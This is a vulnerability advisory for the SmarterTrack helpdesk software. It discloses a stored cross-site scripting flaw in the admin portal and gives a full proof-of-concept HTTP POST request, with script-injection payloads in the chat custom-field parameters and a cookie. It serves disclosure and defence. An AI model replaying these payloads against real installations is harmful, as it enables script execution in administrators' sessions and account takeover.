Advisory

Upgrade to the latest version of SmarterTrack

Technical details

By sending a POST request it was possible to create a stored XSS in the admin portal.

POST /api/Chat/StartChat HTTP/1.1
Host: test.local:9996
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://test.local:9996/Main/frmNewTicket.aspx?InstanceID=b89c5630-ce51-4282-a9c6-63e8bb444534
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 559
Origin: http://test.local:9996
DNT: 1
Connection: close
Cookie: SelectedLanguage=en-gb; ASP.NET_SessionId=jguokmkaxmgqyqkxwvprsaep; __AntiXsrfToken=ee8bcd6769e94ed090a08b7020ff1172; uidut=2; CookieTest=; InterfaceSpecs={"tickets":"idle/asc"}; .ASPXAUTH=DF257D6ADF4E34593264E1481A38B7BD93E44F8911451FCBDC6FD7995FBBD326C4F737F1B264A5875C75CFBC9681D79C9B06BA3F6813146CB88B899362FC98DA7DB76F0F34121FE0C3A64CC5808A6BFA792668C9CE4DCBB7247D589984242A87; st_ChatWidgetStatus=2|0|0; st_SurveyOfferedID=; st_ChatDepartment=1; st_PreChatCF={"1":"test2<img/src=\"x\"/onerror=alert(1)>","2":"<img/src=\"x\"/onerror=alert(1)>test2@wietseboonstra.nl","TB":"test2<img/src=\"x\"/onerror=alert(1)>"}

ChatID=1&InfoGuid=9af393f361de44bb84627b64fbe0f026&LastEventID=2&UserLanguage=&UnsentMessageStandard=&DepartmentID=1&Status=2&CustomFields%5B0%5D%5BID%5D=1&CustomFields%5B0%5D%5BDefaultValue%5D=<IMG+"""><SCRIPT>alert(1)</SCRIPT>">&CustomFields%5B0%5D%5BSpecialMapping%5D=UserDisplayName&CustomFields%5B0%5D%5BDisplayName%5D=Display+Name&CustomFields%5B1%5D%5BID%5D=2&CustomFields%5B1%5D%5BDefaultValue%5D=i@a.a<IMG+"""><SCRIPT>alert(2)</SCRIPT>">&CustomFields%5B1%5D%5BSpecialMapping%5D=UserEmailAddress&CustomFields%5B1%5D%5BDisplayName%5D=Email&VisitorGuid=

Vulnerable parameters CustomFields%5B0%5D%5BDefaultValue%5D and CustomFields%5B1%5D%5BDefaultValue%5D